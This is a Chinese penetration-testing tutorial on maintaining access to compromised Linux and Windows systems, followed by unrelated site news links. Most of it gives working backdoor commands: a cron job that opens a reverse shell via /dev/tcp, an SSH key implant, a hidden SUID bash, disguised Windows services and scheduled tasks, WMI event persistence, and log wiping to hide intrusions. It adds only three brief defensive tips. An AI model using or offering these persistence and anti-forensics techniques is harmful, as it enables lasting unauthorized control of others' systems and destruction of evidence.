撤出之后如何“随时回来”?权限维持的5种姿势(第十一弹·权限维持篇)
你辛辛苦苦拿下了域控结果第二天运维发现漏洞打了个补丁你的Webshell被删了、账号被禁了——一切归零。真相是没有权限维持的渗透等于“一次性参观券”。全文约2100字阅读约7分钟。今天教你如何在撤出之后还能“随时回来”。一、先讲一个真实故事一个计划任务“潜伏”了427天某大型企业的红蓝对抗演练中蓝队防守方花了整整14个月才把红队的所有后门清理干净。红队做了什么很简单——他们在第一台失陷的Linux服务器上写了一个每72小时执行一次的cron计划任务。任务内容是从一个隐蔽的GitHub仓库下载并执行一个反弹Shell脚本。蓝队清理了Webshell、修补了漏洞、重置了密码——但漏掉了这个cron任务。14个月后在一次季度巡检中才偶然发现。而这14个月里红队随时可以“复活”。这就是权限维持的威力你不需要永远在线只要留一把“后门钥匙”想什么时候回来就什么时候回来。二、权限维持到底是什么说人话官方定义权限维持Persistence是指攻击者在成功获取系统访问权限后采取一系列技术手段确保其能够在后续任意时间点重新获得对目标系统的控制权即使在系统重启、补丁更新或账户密码变更后仍能保持访问能力。说人话就是一句话给自己留一把“万能钥匙”随时能再进来。想象一下你是一个小偷撬开了银行金库的门拿到了权限。但你不可能一直待在金库里——你要撤走。撤走之前你在金库的通风管道里藏了一把备用钥匙后门。下次你想来的时候不用再撬门直接掏钥匙进来就行。有权限维持你是“业主”没有权限维持你是“游客”。三、Linux权限维持7种姿势从入门到“隐形” 姿势一计划任务后门Cron——最经典、最稳定原理利用Linux的cron定时任务定期执行恶意脚本。一句话后门bashecho */10 * * * * root /bin/bash -c bash -i /dev/tcp/你的IP/端口 01 /etc/crontab每10分钟反弹一次Shell你随时都能连回来。 高级玩法把脚本存在/dev/shm/内存目录重启就消失但cron任务还在脚本没了会自动重新下载。 姿势二SSH免密登录——最“合法”的后门原理把自己的公钥写入目标服务器的~/.ssh/authorized_keys。bashecho ssh-rsa AAAAB3NzaC1yc2EAAA... ~/.ssh/authorized_keys运维查日志只能看到“正常SSH登录”——完全合法无法察觉。 高级玩法不只留~/.ssh/authorized_keys还要留一条SSH连接复用——~/.ssh/config里配置ControlMaster即使换了公钥也能复用已建立的连接。 姿势三SUID后门——“合法程序”藏玄机原理给一个常见系统命令如find设置SUID位让它执行时拥有root权限。bashcp /bin/bash /bin/.hidden_bash chmod 4755 /bin/.hidden_bash运行时/bin/.hidden_bash -p→直接获得root shell。运维看到的是“一个系统进程在运行”根本不会起疑。 姿势四PAM后门——SSH登录直接“偷密码”原理修改PAM认证模块文件让SSH登录时把你的密码记录下来同时还能正常登录系统。这是顶级后门——你连系统都不用进去每次有人SSH登录密码就自动发到你的邮箱或日志文件里。 姿势五内核模块后门LKM——最隐蔽、最难查原理加载一个恶意内核模块LKM在内核层面隐藏进程、文件、网络连接。你开着后门netstat看不到、ps看不到、ls看不到——就好像“隐身”一样。防御方想查你必须重启系统或者拆机取证。 姿势六inotify后门——文件变化自动触发的潜伏者原理利用inotify机制监控文件变化一旦有文件变化就触发执行恶意代码。比如监控/etc/passwd——只要有人修改密码文件你就弹一个Shell。 姿势七日志清理与痕迹消除——后门的第一守护者核心命令history -c清当前记录unset HISTFILE禁止后续记录sed -i /可疑IP/d /var/log/auth.log删除登录日志。最后记得清理~/.bash_history让运维复查时什么都找不到。四、Windows权限维持5种姿势从入门到“影分身” 姿势一自启动项Startup Folder——最简单的“复活甲”原理把恶意程序放在“启动”文件夹用户每次登录都会自动执行。路径用户级C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\系统级C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\只要放一个exe进去每次开机自动上线。 姿势二注册表自启动——最经典的“开机自启”原理在注册表的特定键值下写入恶意程序路径。三个最常用的位置textHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceRun和RunOnce的区别Run是每次开机都运行RunOnce是只在下次重启时运行一次适合“一次性潜伏”场景。 姿势三Windows服务后门——最“正规”的伪装原理创建一个系统服务伪装成系统组件开机自动启动。用sc命令创建cmdsc create WindowsUpdateService binPath C:\Windows\Temp\backdoor.exe start auto运维在服务列表里看到的是一个叫“WindowsUpdate”的服务谁会怀疑 姿势四计划任务后门——最灵活的定时器原理和Linux的cron一样创建计划任务定期执行。cmdschtasks /create /tn 系统维护 /tr C:\Windows\Temp\backdoor.exe /sc daily /st 02:00每天凌晨2点执行你睡醒就有Shell。 姿势五WMIWindows Management Instrumentation后门——最隐蔽的“无文件攻击”原理通过WMI在系统里注册一个永久事件监听器不写文件、不写注册表、只在内存里运行。powershell# 创建永久WMI事件监听器 Register-WmiEvent -Query SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA Win32_ProcessStartup -Action { 反弹Shell代码 }杀毒软件扫不到、运维肉眼查不到、重启后自动恢复——只有内存取证才能发现。五、红队的“终极奥义”三层后门体系层级形式特点表层后门WebShell、自启动项容易被发现用于第一波进入中层后门计划任务、服务、注册表有一定隐蔽性清理需要一定技术深层后门LKM、PAM后门、WMI永久事件极难发现需要专业工具和深入分析高手从不只留一个后门——他们会留一套“后门体系”。你清理了WebShell表层我还有计划任务中层在10分钟后重建它你清理了计划任务中层我还有WMI深层在5分钟后重建计划任务。六、怎么防给防御方的3条核心建议① 基线监控对比系统服务的“黄金镜像”任何偏离基线的新增服务、任务、启动项都要告警。② 日志审计重点关注/var/log/auth.log和Windows安全日志4624、4672事件中的非正常时间登录行为。③ 终端检测与响应EDR现代EDR能检测内存中的恶意行为和异常进程链——传统杀毒软件防不住的后门EDR可以。七、学习资源包 推荐靶场VulnHub的FRISTILEAKS、Mr-Robot涉及多种权限维持手法以及TryHackMe的Persistence专项房间。 推荐阅读FreeBuf搜索“权限维持”标签大量实战案例以及《红队之道持久化访问技术手册》。️ 必装工具Linux下用chkrootkit/rkhunter检测后门Windows下用Autoruns、TCPView排查自启动。写在最后SQL注入是“进门”文件上传是“送武器”提权是“夺权”横向移动是“攻城略地”——权限维持是“修建永久工事”。没有权限维持你的一切努力都是“一次性”的。有了权限维持你的每一次渗透都在为下一次渗透积累“资本”。今天这篇文章我带你从Linux到Windows从表层后门到深层后门走了一遍。真正的渗透高手不是“能进来”而是“想什么时候进来就什么时候进来”。—— 手把手带你上路的网安教练下一期预告第十二弹·结束也是开始——《从0到1如何用6个月找到你的第一份网络安全工作》。这个系列到今天就暂时告一段落了最后一篇送你一份完整的求职实战地图记得来看。

相关新闻

智能无人机(UAV)影像单株树木健康评估检测数据集无人机航拍树木数据集、YOLOv11树木检测数据集、树木折断识别、枯死树木检测、多季节林地数据、智慧林业AI数据集树木健康检测、林业巡检

智能无人机(UAV)影像单株树木健康评估检测数据集无人机航拍树木数据集、YOLOv11树木检测数据集、树木折断识别、枯死树木检测、多季节林地数据、智慧林业AI数据集树木健康检测、林业巡检

智能航拍无人机(UAV)影像单株树木健康评估检测数据集 无人机拍摄的高分辨率影像数据,涵盖了不同季节和天气条件下的森林区域,700余张高分辨率无人机图像(1293*1293左右),采用yolo格式标注&#…

2026/7/23 6:54:05 阅读更多 →
数字信号处理实验:AD7606采样与FFT频谱分析实践

数字信号处理实验:AD7606采样与FFT频谱分析实践

1. 实验背景与核心目标在数字信号处理的教学实践中,信号的抽样定理是最基础也是最重要的理论之一。这个实验通过国产教学实验箱的硬件平台,让学生直观理解模拟信号如何通过采样转换为数字信号,以及如何通过离散采样点重建原始信号。实验箱采用…

2026/7/23 3:34:58 阅读更多 →
紫光同创PDS开发环境入门与FPGA设计实践

紫光同创PDS开发环境入门与FPGA设计实践

1. 认识紫光同创PDS开发环境作为一名FPGA工程师,第一次接触紫光同创的Pango Design Suite(PDS)时,最直观的感受就是它与其他主流EDA工具(如Vivado或Quartus)在界面布局和操作逻辑上的差异。PDS作为国产FPGA…

2026/7/23 1:56:57 阅读更多 →

最新新闻

【Springboot毕设全套源码+文档】基于springboot林业资源管理系统设计与实现(丰富项目+远程调试+讲解+定制)

【Springboot毕设全套源码+文档】基于springboot林业资源管理系统设计与实现(丰富项目+远程调试+讲解+定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/7/23 21:54:07 阅读更多 →
山东枣庄大跨距电缆桥架测评:悦尚电气质量优但价格略高,适用

山东枣庄大跨距电缆桥架测评:悦尚电气质量优但价格略高,适用

在当今电力系统和建筑工程中,大跨距电缆桥架的应用日益广泛。对于山东枣庄地区而言,选择合适的大跨距电缆桥架供应商至关重要。本次测评旨在为对山东枣庄大跨距电缆桥架供应商感兴趣的人群,提供客观、真实的数据和信息,以便做出合…

2026/7/23 21:54:07 阅读更多 →
【单片机毕业设计推荐】 基于 STM32 的智能恒温出水控制系统设计与实现 ,基于 STM32 的带儿童锁智能饮水装置控制系统开发(012103)

【单片机毕业设计推荐】 基于 STM32 的智能恒温出水控制系统设计与实现 ,基于 STM32 的带儿童锁智能饮水装置控制系统开发(012103)

文章目录20 个相关毕业设计备选题目项目研究背景摘要总体方案核心功能一、基础监测功能二、人机交互与安全防护核心功能三、出水控制核心功能四、辅助安全报警功能技术路线项目演示关于我们项目案例源码获取博主介绍:✌️码农一枚 ,专注于大学生项目实战…

2026/7/23 21:54:07 阅读更多 →
跨设备影音浏览分享

跨设备影音浏览分享

平时看完正版影片会剪辑自制片段,全部存放在迅雷云端。多端自动同步,电视端也能预览自己剪辑的素材,只收纳原创影像,不分享版权影视资源。xunlei 伊伊日常收纳 ,baocunxiazai #影音收纳 #实用工具

2026/7/23 21:54:07 阅读更多 →
TVA驱动的具身智能迭代逻辑(10)

TVA驱动的具身智能迭代逻辑(10)

前沿技术探索:AI智能体视觉(TVA,Transformer-based Vision Agent)是依托Transformer架构与“因式智能体”理论所构建的颠覆性工业视觉技术,是集深度强化学习(DRL)、卷积神经网络(CNN…

2026/7/23 21:54:07 阅读更多 →
华为云高校公开课走进中山大学,聚焦智能体时代企业级开发能力建设

华为云高校公开课走进中山大学,聚焦智能体时代企业级开发能力建设

7月13日,华为云开发者发展与运营部部长林华鼎受邀走进中山大学深圳校区电子与通信工程学院,为30名学生带来《AI编程实战:重构学习生活,洞见企业级开发》专题授课,聚焦智能体时代产业真实需求,输出企业级AI开…

2026/7/23 21:53:06 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击: https://codechina.net 第一章:AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后,我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 17:49:47 阅读更多 →

月新闻